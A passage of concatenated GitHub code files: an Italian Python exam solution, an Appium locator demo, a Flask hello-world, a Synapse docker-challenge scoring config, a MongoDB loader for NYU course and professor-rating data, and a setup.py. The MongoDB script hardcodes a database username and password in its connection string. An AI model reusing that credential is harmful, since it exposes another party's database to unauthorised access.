\nLa funzione (6 punti) deve leggere un'immagine png contenuta nel file 'img_in'\ncostituita da uno sfondo nero e da diversi pixel colorati e costruire e salvare\nin un nuovo file 'img_out' un'immagine delle stesse dimensioni di quella\ncontenuta in img_in. L'immagine ha al più tre pixel per ogni riga.\n\nLa nuova immagine dovrà contenere dei segmenti orizzontali calcolati a partire\ndall'immagine contenuta nel file 'img_in' nel seguente modo:\n - per ogni riga contenente almeno tre pixel, è presente esattamente un\n segmento\n - ogni segmento è in corrispondenza di tre pixel dell'immagine in 'img_in',\n presenti sulla stessa riga (esempio: se sulla riga y, ci sono i punti\n x1 < x2 < x3, il segmento sulla riga y va dalla colonna x1 alla colonna x3)\n - il colore del segmento è la media, canale per canale, dei colori dei tre\n pixel\n\nLa funzione deve inoltre restituire (3 punti) il numero massimo di righe\nconsecutive dell'immagine costruita che contengono un segmento.\n\"\"\"\n\nimport images\n\n\ndef fatti_riga(riga):\n newrow = [(0,0,0)]*len(riga)\n x = [i for i, p in enumerate(riga) if p != (0,0,0)]\n if len(x) < 3:\n return newrow\n maxl = 0\n maxx = None\n for i in range(len(x)-2):\n l = x[i+2] - x[i]\n if l > maxl:\n maxl = l\n maxx = x[i:i+3]\n # print(x, maxx)\n color = tuple(int(sum(map(lambda x: riga[x][i], maxx))/3) for i in (0,1,2))\n newrow[maxx[0]:maxx[2]+1] = [color]*(maxl+1)\n return newrow\n \n\ndef ex2(img_in, img_out):\n img = images.load(img_in)\n img_o = []\n righe = []\n for riga in img:\n img_o.append(fatti_riga(riga))\n righe.append(1 if len(set(img_o[-1])-set([(0,0,0)]))>0 else 0)\n images.save(img_o, img_out)\n print(righe)\n m = 0\n c = 0\n for i in righe:\n if i>0:\n c+=1\n else:\n if c > m:\n m=c\n c = 0\n return m\n\n\ndef ex2(img_in, img_out):\n img = images.load(img_in)\n img_o = []\n righe = []\n for riga in img:\n img_o.append(fatti_riga(riga))\n if len(set(img_o[-1])-set([(0,0,0)]))>0:\n righe.append(1+sum(righe[-1:]))\n else:\n righe.append(0)\n # img_o[-1][-1]=(1,2,3)\n images.save(img_o, img_out)\n # print(righe)\n return max(righe)\n\n# %% ----------------------------------- EX.3 --------------------------------- #\n\n\"\"\"\nEsercizio 3: 8 punti \nScrivere una funzione ricorsiva o che fa uso di funzioni ricorsive che\nprende in input una stringa che rappresenta il nome di una directory e\nun intero k e restituisce un dizionario.\n\nAll'interno del dizionario le chiavi sono delle stringhe che rappresentano\ni percorsi di alcuni file con estensione '.txt', relativi alla directory in\ninput.\nIl valore associato ad una chiave è il numero intero dato dalla somma\ndi tutte le stringhe numeriche contenute nel file indicato dalla chiave.\n\nATTENZIONE: devono essere presenti nel dizionario soltanto quei file che\ncontengono delle stringhe numeriche la cui somma è un valore multiplo\ndell'intero k preso in input.\n\n\nEs: se un file contiene \"34 casa c4a 22\", la somma delle stringhe numeriche\n in esso contenute è 34+22=56 (infatti c4a *non* è una stringa numerica).\n \nNon è consentito utilizzare la funzione os.walk.\nPer valutare se una stringa è numerica si può utilizzare il metodo isnumeric\n\"\"\"\n\nimport os\n\n\ndef check_file(file):\n with open(file) as f:\n text = f.read()\n return sum([int(w) for w in text.split() if w.isnumeric()])\n\ndef ex3(path, k):\n d = {}\n for file in os.listdir(path):\n ffile = path + '/' + file\n if os.path.isdir(ffile):\n d.update(ex3(ffile, k))\n if ffile.endswith('.txt') and os.path.isfile(ffile):\n i = check_file(ffile)\n if i % k == 0:\n d[ffile]=i\n return d\n\n# %% ----------------------------------- EX.4 ----------------------------------- #\n'''\nEsercizio 4: 9 punti (6+3)\n\nL'operazione di accodamento \"§\" fra due stringhe A e B è possibile se la stringa\nA termina con il primo carattere della stringa B. 
Il risultato dell'operazione\nA § B è simile alla concatenazione, soltanto che il primo carattere di B è\nrimosso: dog § good = dogood.\n\nScrivere una funzione ricorsiva o che fa uso di funzioni ricorsive che\nprende in input una stringa start e un set di stringhe words e calcola\nricorsivamente tutte le possibili stringhe massimali che possono essere generate\nda accodamenti successivi a partire dalla stringa start, rimuovendo le parole\naccodate. \nPer massimale si intende che una stringa non può essere più ulteriormente\nconcatenata con alcuna altra stringa rimasta in words, dopo tutti gli\naccodamenti.\n\nEsempio: 'aa' {'abb', 'acc', 'bdd', 'be'}\n\naa {abb, acc, bdd, be}\n|\n|- § abb -- aabb {acc, bdd, be}\n| |\n| |- § bdd -- aabbdd(*) {acc, be}\n| |\n| |- § be -- aabbe(*) {acc, bdd}\n|\n|- § acc -- aacc(*) {abb, bdd, be}\n\nLe stringhe con (*) sono massimali rispetto al set words iniziale.\n\nEsempio: 'dog' {'good', 'gost', 'goat', 'mood', 'doom', 'gasp', 'pool', 'long', 'loud'}\n\ndog {good, gost, goat, mood, doom, gasp, pool, loop}\n|\n|- § gost -- dogost(*) {good, goat, mood, doom, gasp, pool, loop}\n|\n|- § goat -- dogoat(*) {good, gost, mood, doom, gasp, pool, loop}\n|\n|- § good -- dogood {gost, goat, mood, doom, gasp, pool, long, loud}\n| |\n| |- § doom -- dogoodoom {gost, goat, mood, gasp, pool, long, loud}\n| |\n| |- § mood -- dogoodoomood(*) {gost, goat, gasp, pool, long, loud}\n|\n|- § gasp -- dogasp {good, gost, goat, mood, doom, pool, long, loud}\n |\n |- § pool -- dogaspool {good, gost, goat, mood, doom, long, loud}\n |\n |- § loud -- dogaspooloud {good, gost, goat, mood, doom, long}\n | |\n | |- § doom -- dogaspooloudoom {good, gost, goat, mood, long}\n | |\n | |- § mood -- dogaspooloudoomood(*) {good, gost, goat, long}\n |\n |- § long -- dogaspoolong {good, gost, goat, mood, doom, loud}\n |\n |- § good -- dogaspoolongood {mood, gost, goat, doom, loud}\n | |\n | |- § doom -- dogaspoolongoodoom {mood, gost, goat, loud}\n | |\n | |- § mood -- dogaspoolongoodoomood(*) {gost, goat, loud}\n |\n |- § gost -- dogaspoolongost(*) {good, goat, mood, doom, loud}\n |\n |- § goat -- dogaspoolongoat(*) {good, gost, mood, doom, loud}\n \nLe stringhe con (*) sono massimali rispetto al set words iniziale.\n\nLa funzione deve ritornare l'insieme di tutte le stringhe che è possibile\ngenerare (ovvero le foglie dell'albero di gioco), come un insieme (6 punti),\n oppure (+3 punti) come una lista ordinata in in cui:\n - le stringhe sono ordinate in modo crescente rispetto alla loro lunghezza\n - in caso di pari lunghezza, in ordine alfabetico.\n\nNell'esempio ex4('aa' ,{'abb', 'acc', 'bdd', 'be'}) la funzione ritorna l'insieme\n{'aacc', 'aabbdd', 'aabbe'} (6 punti)\noppure la lista\n['aacc', 'aabbe', 'aabbdd'] (9 punti)\n\nNell'esempio ex4('dog', {'good', 'gost', 'goat', 'mood', 'doom', 'gasp', 'pool', 'long', 'loud'})\nla funzione ritorna l'insieme\n{'dogaspoolongoodoomood', 'dogaspooloudoomood', 'dogoodoomood', 'dogaspoolongost',\n 'dogaspoolongoat', 'dogost', 'dogoat'} (6 punti)\noppure la lista \n['dogoat', 'dogost', 'dogoodoomood', 'dogaspoolongoat', 'dogaspoolongost', 'dogaspooloudoomood', 'dogaspoolongoodoomood'] (9 punti)\n\n'''\ndef ex4(start, words):\n s = ex4set(start, words)\n # if start[0]!='p':\n # return s\n return sorted(s, key=lambda x: (len(x), x))\n\ndef ex4set(start, words):\n if len(words) == 0:\n return {start}\n ret = set()\n append_list = [w for w in words if start.endswith(w[0])]\n if len(append_list) == 0:\n return {start}\n for word in append_list:\n 
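# accodamento: l'ultimo carattere di start coincide col primo di word,\n # quindi lo togliamo da start e ricorriamo senza word\n 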
ret.update(ex4(start[:-1]+word, words-{word}))\n return ret\n###################################################################################\nif __name__ == '__main__':\n # inserisci qui i tuoi test\n print('*'*50)\n print('ITA\\nDevi eseguire il grade.py se vuoi debuggare con il grader incorporato.')\n print('Altrimenit puoi inserire qui del codice per testare le tue funzioni ma devi scriverti i casi che vuoi testare')\n print('*'*50)\n print('ENG\\nYou have to run grade.py if you want to debug with the automatic grader.')\n print('Otherwise you can insert here you code to test the functions but you have to write your own tests')\n print('*'*50)\n","repo_name":"struggling-student/PythonExercises","sub_path":"Esami/2021-2022/Esame-5/program.aspo.py","file_name":"program.aspo.py","file_ext":"py","file_size_in_byte":12637,"program_lang":"python","lang":"it","doc_type":"code","stars":12,"dataset":"github-code","pt":"40"} +{"seq_id":"42081123522","text":"# -*- coding: utf-8 -*-\n# @Time :2020/8/30 19:37\n# @Author : liufei\n# @File :元素定位.PY\n\nfrom appium import webdriver\nfrom appium.webdriver.common.mobileby import MobileBy\n\ndesird_caps = {}\n#appium服务器初始化\n#平台类型\ndesird_caps['platformName'] = 'Android'\n#平台版本号\ndesird_caps['platformVersion'] = '7.1'\n#设备名称\ndesird_caps['deviceName'] = 'Android Emulator'\n#app包名\ndesird_caps['appPackage'] = 'com.wandoujia.phoenix2'\n#app入口activitiy\ndesird_caps['appActivity'] = 'com.pp.assistant.activity.PPMainActivity'\n#连接appium server.\ndriver = webdriver.Remote('http://127.0.0.1:4723/wd/hub', desird_caps)\n\n'''\napp中的元素定位类型既有自己特殊的定位类型(accessibility_id、android_uiautomator等)\n又继承了web中selenium中的元素定位类型(tag_name、LINK_TEXT等)\n'''\n#元素定位,返回一个webelement对象\n#通过resource-id定位元素\ndriver.find_element_by_id('com.lemon.lemonban:id/navigation_tiku')\n#通过class定位元素\ndriver.find_element_by_class_name('android.widget.FrameLayout')\n#通过content-desc定位元素\ndriver.find_element_by_accessibility_id('******')\n#通过AndroidUiAutomator定位元素\ndriver.find_element_by_android_uiautomator('new UiSelector().text(\"柠檬社区\")')\n\n\n","repo_name":"James-Bond-Liu/Auto_Test","sub_path":"lemon_app/基础知识/元素定位.py","file_name":"元素定位.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12566841578","text":"__author__ = \"Janssen Lima\"\r\n__email__ = \"janssenreislima@gmail.com\"\r\n__status__ = \"prod\"\r\n\r\nimport logging\r\nfrom flask import Flask\r\n\r\n\r\napp = Flask(__name__)\r\n\r\nlog = logging.getLogger('werkzeug')\r\nlog.setLevel(logging.ERROR)\r\n\r\n\r\n@app.route(\"/\")\r\ndef index():\r\n app.logger.info('Olá, mundo')\r\n return \"Olá, mundo!\"\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True, port=5000,host=\"0.0.0.0\")\r\n","repo_name":"janssenlima/app-python","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70148581560","text":"import docker\nimport json\nimport subprocess\nimport requests\nfrom synapseclient import File, Folder\nimport synapseutils as synu\nimport zipfile\nimport os\nimport base64\nimport time\n\n#Synapse Id of Challenge\nCHALLENGE_SYN_ID = \"syn8228304\"\n#Synapse Id of directory that you want the log files to go into\nCHALLENGE_LOG_FOLDER = \"syn9771357\"\nCHALLENGE_PREDICTION_FOLDER = \"syn8729051\"\n\n## Name of your challenge, defaults to the name of the challenge's project\nCHALLENGE_NAME = \"NCI-CPTAC 
DREAM Proteogenomics Challenge\"\n\n## Synapse user IDs of the challenge admins who will be notified by email\n## about errors in the scoring script\nADMIN_USER_IDS = [3324230,3360851]\n\n\nconfig_evaluations = [\n#Proteogenomics Subchallenge 1 (8720143)\n#Proteogenomics Subchallenge 2 (8720145)\n#Proteogenomics Subchallenge 3 (8720149)\n\n {\n 'id':8720143,\n 'score_sh':'/score_sc1.sh',\n 'returnLog':False\n },\n {\n 'id':8720145,\n 'score_sh':'/score_sc2.sh',\n 'returnLog':False\n },\n {\n 'id':8720149,\n 'score_sh':'/score_sc3.sh',\n 'returnLog':False\n },\n#Proteogenomics Subchallenge 1 Express (9604716)\n#Proteogenomics Subchallenge 2 Express (9604717)\n#Proteogenomics Subchallenge 3 Express (9604718)\n\n {\n 'id':9604716,\n 'score_sh':'/score_sc1.sh',\n 'returnLog':True\n },\n {\n 'id':9604717,\n 'score_sh':'/score_sc2.sh',\n 'returnLog':True\n },\n {\n 'id':9604718,\n 'score_sh':'/score_sc3.sh',\n 'returnLog':True\n },\n#Proteogenomics Subchallenge 1 Internal (9606530)\n#Proteogenomics Subchallenge 2 Internal (9606531)\n#Proteogenomics Subchallenge 3 Internal (9606532)\n\n {\n 'id':9606530,\n 'score_sh':'/score_sc1.sh',\n 'returnLog':True\n },\n {\n 'id':9606531,\n 'score_sh':'/score_sc2.sh',\n 'returnLog':True\n },\n {\n 'id':9606532,\n 'score_sh':'/score_sc3.sh',\n 'returnLog':True\n }\n\n]\n\nconfig_evaluations_map = {ev['id']:ev for ev in config_evaluations}\nleaderboard_tables = {}\n\ndef getBearerTokenURL(dockerRequestURL, user, password):\n initialReq = requests.get(dockerRequestURL)\n auth_headers = initialReq.headers['Www-Authenticate'].replace('\"','').split(\",\")\n for head in auth_headers:\n if head.startswith(\"Bearer realm=\"):\n bearerRealm = head.split('Bearer realm=')[1]\n elif head.startswith('service='):\n service = head.split('service=')[1]\n elif head.startswith('scope='):\n scope = head.split('scope=')[1]\n return(\"{0}?service={1}&scope={2}\".format(bearerRealm,service,scope))\n\ndef getAuthToken(dockerRequestURL, user, password):\n bearerTokenURL = getBearerTokenURL(dockerRequestURL, user, password)\n auth = base64.b64encode(user + \":\" + password)\n bearerTokenRequest = requests.get(bearerTokenURL,\n headers={'Authorization': 'Basic %s' % auth})\n return(bearerTokenRequest.json()['token'])\n\ndef zipdir(path, ziph):\n # ziph is zipfile handle\n for root, dirs, files in os.walk(path):\n for file in files:\n ziph.write(os.path.join(root, file),os.path.join(root, file).replace(path+\"/\",\"\"))\n\n\ndef dockerValidate(submission, syn, user, password, returnLog):\n submissionJson = json.loads(submission['entityBundleJSON'])\n assert submissionJson['entity'].get('repositoryName') is not None, \"Must submit a docker container\"\n dockerRepo = submissionJson['entity']['repositoryName'].replace(\"docker.synapse.org/\",\"\")\n #assert dockerRepo.startswith(\"docker.synapse.org\")\n assert submission.get('dockerDigest') is not None, \"Must submit a docker container with a docker sha digest\"\n dockerDigest = submission['dockerDigest']\n index_endpoint = 'https://docker.synapse.org'\n #dockerImage = dockerRepo + \"@\" + dockerDigest\n\n #Check if docker is able to be pulled\n dockerRequestURL = '{0}/v2/{1}/manifests/{2}'.format(index_endpoint, dockerRepo, dockerDigest)\n token = getAuthToken(dockerRequestURL, user, password)\n\n resp = requests.get(dockerRequestURL,\n headers={'Authorization': 'Bearer %s' % token})\n assert resp.status_code == 200, \"Docker image + sha digest must exist\"\n \n #Must check docker image size\n #Synapse docker registry\n dockerSize = 
sum([layer['size'] for layer in resp.json()['layers']])\n assert dockerSize/1000000000.0 < 1000, \"Docker image must be less than a terabyte\"\n\n #Send email to me if hard drive is full \n #should be stateless, if there needs to be code changes to the docker agent\n preds = synu.walk(syn, CHALLENGE_PREDICTION_FOLDER)\n predFolders = preds.next()[1]\n predSynId = [synId for name, synId in predFolders if str(submission.id) == name]\n\n logs = synu.walk(syn, CHALLENGE_LOG_FOLDER)\n logsFolders = logs.next()[1]\n logsSynId = [synId for name, synId in logsFolders if str(submission.id) == name]\n\n if len(predSynId) == 0:\n predFolder = syn.store(Folder(submission.id, parent = CHALLENGE_PREDICTION_FOLDER))\n predFolder = predFolder.id\n else:\n predFolder = predSynId[0]\n if len(logsSynId) == 0:\n logFolder = syn.store(Folder(submission.id, parent = CHALLENGE_LOG_FOLDER))\n logFolder = logFolder.id\n if returnLog:\n for participant in submission.contributors:\n if participant['principalId'] in ADMIN_USER_IDS: \n access = ['CREATE', 'READ', 'DOWNLOAD', 'UPDATE', 'DELETE', 'CHANGE_PERMISSIONS', 'MODERATE', 'CHANGE_SETTINGS']\n else:\n access = ['READ','DOWNLOAD']\n #Comment set permissions out if you don't want to allow participants to see the pred files\n #syn.setPermissions(predFolder, principalId = participant['principalId'], accessType = access)\n syn.setPermissions(logFolder, principalId = participant['principalId'], accessType = access)\n else:\n logFolder = logsSynId[0] \n\n if returnLog:\n messageReturned = \"Your submission has been validated! As your submission is being run, please go here: https://www.synapse.org/#!Synapse:%s to check on your log file.\" % logFolder \n else:\n messageReturned = \"Your submission has been validated! Your log files will not be returned, please submit to express lanes to test your model!\"\n\n return(True, messageReturned)\n\n\ndef dockerRun(submission, scoring_sh, syn, client):\n\n #These are the volumes that you want to mount onto your docker container\n OUTPUT_DIR = os.path.join(os.path.dirname(os.path.abspath(__file__)),submission.id)\n TESTDATA_DIR = os.path.join(os.path.dirname(os.path.abspath(__file__)),'evaluation_data')\n #These are the locations on the docker that you want your mounted volumes to be + permissions in docker (ro, rw)\n #It has to be in this format '/output:rw'\n MOUNTED_VOLUMES = {OUTPUT_DIR:'/output:rw',\n TESTDATA_DIR:'/evaluation_data:ro'}\n #All mounted volumes here in a list\n ALL_VOLUMES = [OUTPUT_DIR,TESTDATA_DIR]\n\n allLogs = synu.walk(syn, CHALLENGE_LOG_FOLDER)\n logFolder = allLogs.next()\n logFolderId = [synId for name, synId in logFolder[1] if name == submission.id][0]\n \n allPreds = synu.walk(syn, CHALLENGE_PREDICTION_FOLDER)\n predFolder = allPreds.next()\n predFolderId = [synId for name, synId in predFolder[1] if name == submission.id][0]\n\n dockerDigest = submission.get('dockerDigest')\n submissionJson = json.loads(submission['entityBundleJSON'])\n dockerRepo = submissionJson['entity']['repositoryName']\n dockerImage = dockerRepo + \"@\" + dockerDigest\n\n if not os.path.exists(OUTPUT_DIR):\n os.mkdir(OUTPUT_DIR)\n #Mount volumes\n volumes = {}\n for vol in ALL_VOLUMES:\n volumes[vol] = {'bind': MOUNTED_VOLUMES[vol].split(\":\")[0], 'mode': MOUNTED_VOLUMES[vol].split(\":\")[1]}\n\n # Run docker image\n errors = None\n try:\n container = client.containers.run(dockerImage, scoring_sh, detach=True,volumes = volumes, name=submission.id + \"_t\" + str(int(time.time())), network_disabled=True)\n except 
docker.errors.APIError as e:\n container = None\n errors = str(e) + \"\\n\"\n #Create log file\n logFileName = submission.id + \"_log.txt\"\n logSynId = None\n #Create the logfile\n openLog = open(logFileName,'w').close()\n #While docker is still running (the docker python client doesn't update status)\n #Add sleeps\n if container is not None:\n while subprocess.Popen(['docker','inspect','-f','{{.State.Running}}',container.name],stdout = subprocess.PIPE).communicate()[0] == \"true\\n\":\n logFileText = container.logs()\n with open(logFileName,'w') as logFile:\n logFile.write(logFileText)\n statinfo = os.stat(logFileName)\n #Only store log file if > 0bytes\n if statinfo.st_size > 0 and statinfo.st_size/1000.0 <= 50:\n ent = File(logFileName, parent = logFolderId)\n try:\n logs = syn.store(ent)\n logSynId = logs.id\n except synapseclient.exceptions.SynapseHTTPError as e:\n pass\n time.sleep(60)\n\n #Must run again to make sure all the logs are captured\n logFileText = container.logs()\n with open(logFileName,'w') as logFile:\n logFile.write(logFileText)\n statinfo = os.stat(logFileName)\n #Only store log file if > 0bytes\n if statinfo.st_size > 0 and statinfo.st_size/1000.0 <= 50:\n ent = File(logFileName, parent = logFolderId)\n try:\n logs = syn.store(ent)\n logSynId = logs.id\n except synapseclient.exceptions.SynapseHTTPError as e:\n pass\n container.remove()\n try:\n client.images.remove(dockerImage)\n except:\n print(\"Unable to remove image\")\n\n statinfo = os.stat(logFileName)\n if statinfo.st_size == 0:\n with open(logFileName,'w') as logFile:\n if errors is not None:\n logFile.write(errors)\n else:\n logFile.write(\"No Logs, or logs exceed size limit\")\n logFile.flush()\n ent = File(logFileName, parent = logFolderId)\n try:\n logs = syn.store(ent)\n logSynId = logs.id\n except synapseclient.exceptions.SynapseHTTPError as e:\n pass\n\n if logSynId is None:\n logFile = synu.walk(syn, logFolderId)\n logFiles = logFile.next()\n logSynId = logFiles[2][0][1]\n #Zip up predictions and store it into CHALLENGE_PREDICTIONS_FOLDER\n if len(os.listdir(OUTPUT_DIR)) > 0:\n zipf = zipfile.ZipFile(submission.id + '_predictions.zip', 'w', zipfile.ZIP_DEFLATED)\n zipdir(OUTPUT_DIR, zipf)\n zipf.close()\n\n ent = File(submission.id + '_predictions.zip', parent = predFolderId)\n predictions = syn.store(ent)\n prediction_synId = predictions.id\n os.system(\"rm -rf %s\" % OUTPUT_DIR)\n os.remove(submission.id + '_predictions.zip')\n else:\n prediction_synId = None\n os.remove(logFileName)\n return(prediction_synId, logSynId)\n\n\n\ndef validate_docker(evaluation, submission, syn, client, user, password):\n \"\"\"\n Find the right validation function and validate the submission.\n\n :returns: (True, message) if validated, (False, message) if\n validation fails or throws exception\n \"\"\"\n config = config_evaluations_map[int(evaluation.id)]\n\n results = dockerValidate(submission, syn, user, password, config['returnLog'])\n return(results)\n\ndef run_docker(evaluation, submission, syn, client):\n \"\"\"\n Find the right scoring function and score the submission\n\n :returns: (score, message) where score is a dict of stats and message\n is text for display to user\n \"\"\"\n\n config = config_evaluations_map[int(evaluation.id)]\n prediction_synId, log_synId = dockerRun(submission,config['score_sh'], syn, client)\n if prediction_synId is not None:\n #Comment top line if you don't want to return the synId of prediction file\n #message = \"You can find your prediction file here: 
https://www.synapse.org/#!Synapse:%s\" % prediction_synId\n message = \"Your prediction file has been stored, but you will not have access to it.\"\n else:\n if config['returnLog']:\n message = \"No prediction file generated, please check your log file: https://www.synapse.org/#!Synapse:%s\" % log_synId\n else:\n message = \"No prediction file generated, please submit to the express lanes to debug your model!\"\n\n return (dict(PREDICTION_FILE=prediction_synId, LOG_FILE = log_synId), message)\n\n","repo_name":"Sage-Bionetworks-Challenges/NCI-CPTAC-DREAM-Proteogenomics-Challenge","sub_path":"Subchallenges_2_3/challenge_administration/docker/docker_challenge_config.py","file_name":"docker_challenge_config.py","file_ext":"py","file_size_in_byte":12793,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"5811821246","text":"import pymongo\nimport csv\nimport json\nimport re\nclient = pymongo.MongoClient(\n \"mongodb+srv://kaixuan:happycoding@courseapi-ujwvo.mongodb.net/nyu?retryWrites=true&w=majority\")\ndb = client[\"nyu\"]\n\ncourses = []\nsections = []\nteaches = []\nprofessors = []\n\ndef tokenize(query):\n return ' '.join(re.sub('[^A-Za-z0-9 ]+', '', query).split())\n\ndef dewhitespace(query):\n return ''.join(query.split())\n\n# course_id,course_name,section_id,session,days/times,dates,instructor,status\n# course_id,course_name,section,topic,session,daystimes,dates,instructor,status\ndef getData(filename):\n print('getting data from', filename)\n with open(filename, 'r') as f:\n reader = csv.DictReader(f, quotechar='¥', delimiter=',', quoting=csv.QUOTE_ALL, skipinitialspace=True)\n header = next(reader)\n\n for row in reader:\n\n temp = row['course_name'].split(\"-\", 2)\n # print(temp)\n course_id = temp[0] + temp[1].rstrip()\n\n course_title = temp[2].lstrip()\n\n if row['topic'] != '':\n course_title += \" \" + row['topic']\n\n temp = row['section'].split(\" (\")\n t = temp[0].split('-')[1]\n section = temp[0]\n\n course_title = course_title + \" \" + t\n class_no = temp[1][:-1]\n if filename == 'course_num_fall_2020.csv':\n term = \"Fall 2020\"\n if filename == 'course_num_fall.csv':\n term = \"Fall 2019\"\n if filename == 'course_num_spring.csv':\n term = \"Spring 2020\"\n\n days_times = row['days/times']\n dates = row['dates']\n session = row['session']\n status = row['status']\n\n instructors = row['instructor'].split(\", \")\n\n curr_course = {\n 'courseID': course_id,\n 'courseTitle': course_title\n }\n if curr_course not in courses:\n courses.append(curr_course)\n\n for instructor in instructors:\n\n curr_prof = {\n 'name': instructor,\n 'firstname': instructor.split(' ')[0],\n 'lastname': instructor.split(' ')[-1]\n }\n\n if curr_prof not in professors:\n professors.append(curr_prof)\n\n curr_sec = {\n 'courseID': course_id,\n 'courseTitle': course_title,\n 'classNo': class_no,\n 'term': term,\n 'daystimes': days_times,\n 'dates': dates,\n 'session': session,\n 'section': section,\n 'professor': instructor,\n 'status': status\n }\n\n sections.append(curr_sec)\n\n curr_teach = {\n 'courseID': course_id,\n 'courseTitle': course_title,\n 'professor': instructor\n }\n\n if curr_teach not in teaches:\n teaches.append(curr_teach)\n\nrmp = {}\nnotFoundCount = 0\ntotalCount = 0\ndef getRMP(filename):\n global notFoundCount\n global totalCount\n print('getting data from', filename)\n with open(filename, 'r') as f:\n data = json.load(f)\n for rating in data:\n if rating['wouldTakeAgain'] == \"\":\n wouldTakeAgain = \"N/A\"\n 
else:\n wouldTakeAgain = rating['wouldTakeAgain'] + \"%\"\n\n if rating['score'] == 'N/A':\n rating['score'] = '0'\n \n if rating['levelOfDifficulty'] == '':\n rating['levelOfDifficulty'] = '0'\n\n if rating['numRating'] == '':\n rating['numRating'] = '0'\n\n rmp[rating['name']] = {\n \"name\": rating['name'],\n \"rscore\": float(rating['score']),\n \"rnumRate\": int(rating['numRating']),\n \"department\": rating['department'],\n \"wouldTakeAgain\": wouldTakeAgain,\n \"levelOfDifficulty\": float(rating['levelOfDifficulty']),\n \"tags\": rating['tags']\n }\n\n # print(rmp[rating['name']])\n\n print('combine data from rmp')\n\n \n for name in rmp:\n fname = name.split(' ')[0]\n lname = name.split(' ')[-1]\n\n rating = rmp[name]\n found = False\n for prof in professors:\n if prof['firstname'] == fname and prof['lastname'] == lname:\n prof[\"rscore\"] = rating['rscore']\n prof[\"rnumRate\"] = rating['rnumRate']\n prof[\"department\"] = rating['department']\n prof[\"wouldTakeAgain\"] = rating['wouldTakeAgain']\n prof[\"levelOfDifficulty\"] = rating['levelOfDifficulty']\n prof[\"tags\"] = rating['tags']\n \n found = True\n break\n\n\n if not found:\n notFoundCount += 1\n # print(name)\n # print(name, prof['name'])\n totalCount += 1\n\n\n\ngetData(\"course_num_fall.csv\")\ngetData(\"course_num_spring.csv\")\ngetData(\"course_num_fall_2020.csv\")\n\ngetRMP(\"rmp/RMPdata.json\")\n\n# print(professors)\nprint(notFoundCount, totalCount)\n\n\nfor i in range(len(courses)):\n courses[i]['numRate'] = 0\n courses[i]['score'] = 0\n courses[i]['_total'] = tokenize(courses[i]['courseID'] + \" \" + courses[i]['courseTitle'])\n courses[i]['_total_concat'] = dewhitespace(courses[i]['_total'])\n\nfor i in range(len(professors)):\n professors[i]['numRate'] = 0\n professors[i]['score'] = 0\n\n\n# _total = tokenize(course_id + \" \" + course_title)\n# 'numRate': 0,\n# 'score': 0,\n# '_total': _total,\n# '_total_concat': dewhitespace(_total)\n\n\n\n# 'score': 0,\n# 'numRate': 0\n# 'rscore': 0,\n# 'rnumRate': 0,\n# 'rtags': [],\n# 'department': '',\n# 'wouldTakeAgain': '',\n# 'levelOfDifficulty': ''\n\ndb['sections'].drop()\ndb['courses'].drop()\ndb['teaches'].drop()\ndb['professors'].drop()\ndb['sections'].insert_many(sections)\ndb['courses'].insert_many(courses)\ndb['teaches'].insert_many(teaches)\ndb['professors'].insert_many(professors)\n","repo_name":"ChenZ0912/GoBert","sub_path":"data/filled_db.py","file_name":"filled_db.py","file_ext":"py","file_size_in_byte":6153,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"7052290530","text":"from setuptools import setup\nfrom pathlib import Path\nfrom cmake_build_extension import BuildExtension, CMakeExtension\n\ndatadir = Path(__file__).parent / 'python/flexflow'\nfiles = [str(p.relative_to(datadir)) for p in datadir.rglob('*.py')]\n\nsetup(\n name='flexflow',\n version='1.0',\n description='FlexFlow Python package',\n url='https://github.com/flexflow/FlexFlow',\n license='Apache',\n packages=['flexflow'],\n package_data={'flexflow': files},\n zip_safe= False,\n install_requires=['numpy>=1.16',\n 'cffi>=1.11',\n 'qualname',\n 'keras_preprocessing',\n 'Pillow',\n 'cmake-build-extension',\n 'pybind11'\n ],\n ext_modules=[\n CMakeExtension(name='flexflow',\n install_prefix='flexflow',\n cmake_configure_options=[\n '-DCUDA_USE_STATIC_CUDA_RUNTIME=OFF -DCUDA_PATH=/projects/opt/centos7/cuda/10.1 -DCUDNN_PATH=/projects/opt/centos7/cuda/10.1 -DFF_USE_PYTHON=ON -DFF_USE_NCCL=OFF -DFF_USE_GASNET=OFF 
-DFF_BUILD_EXAMPLES=OFF -DFF_USE_AVX2=OFF -DFF_MAX_DIM=4',\n ]),\n ],\n cmdclass=dict(build_ext=BuildExtension),\n classifiers=[\n 'Programming Language :: Python :: 3.6',\n 'License :: OSI Approved :: Apache Software License',\n 'Operating System :: POSIX :: Linux',\n 'Topic :: Software Development :: Libraries',\n ],\n python_requires='>=3.6',\n)\n","repo_name":"merrymercy/FlexFlow","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"39571213574","text":"import re\n\nimport pandas as pd\n\n\nclass CompoundMatch:\n # ORF_ID\n # A_domain_Idx\n # Prediction_DL - config (not used)\n # Prediction_Top_Residue\n # Prediction_Top_Score\n # Prediction_Modifications\n # Matched_Residue\n # Matched_Residue_Score\n # Nerpa_Score\n # Monomer_Idx\n # Monomer_Code\n # Monomer_DL - config (not used)\n # Monomer_Residue\n # Monomer_Modifications\n def __init__(self, orf_id: str, a_domain_id: int, genome_acid: str,\n genome_score: int, genome_modification: str,\n graph_acid: str, graph_score: int,\n nerpa_score: float, rban_graph_id: int,\n rban_acid_code: str, rban_acid: str,\n rban_modification: str):\n self.orf_id = orf_id\n self.a_domain_id = a_domain_id\n self.genome_acid = genome_acid\n self.genome_score = genome_score\n self.genome_modification = genome_modification\n self.graph_acid = graph_acid\n self.graph_score = graph_score\n self.nerpa_score = nerpa_score\n self.rban_graph_id = rban_graph_id\n self.rban_acid_code = rban_acid_code\n self.rban_acid = rban_acid\n self.rban_modification = rban_modification\n\n @staticmethod\n def from_dataframe_row(row):\n return CompoundMatch(\n orf_id=row['ORF_ID'],\n a_domain_id=int(row['A_domain_Idx']),\n 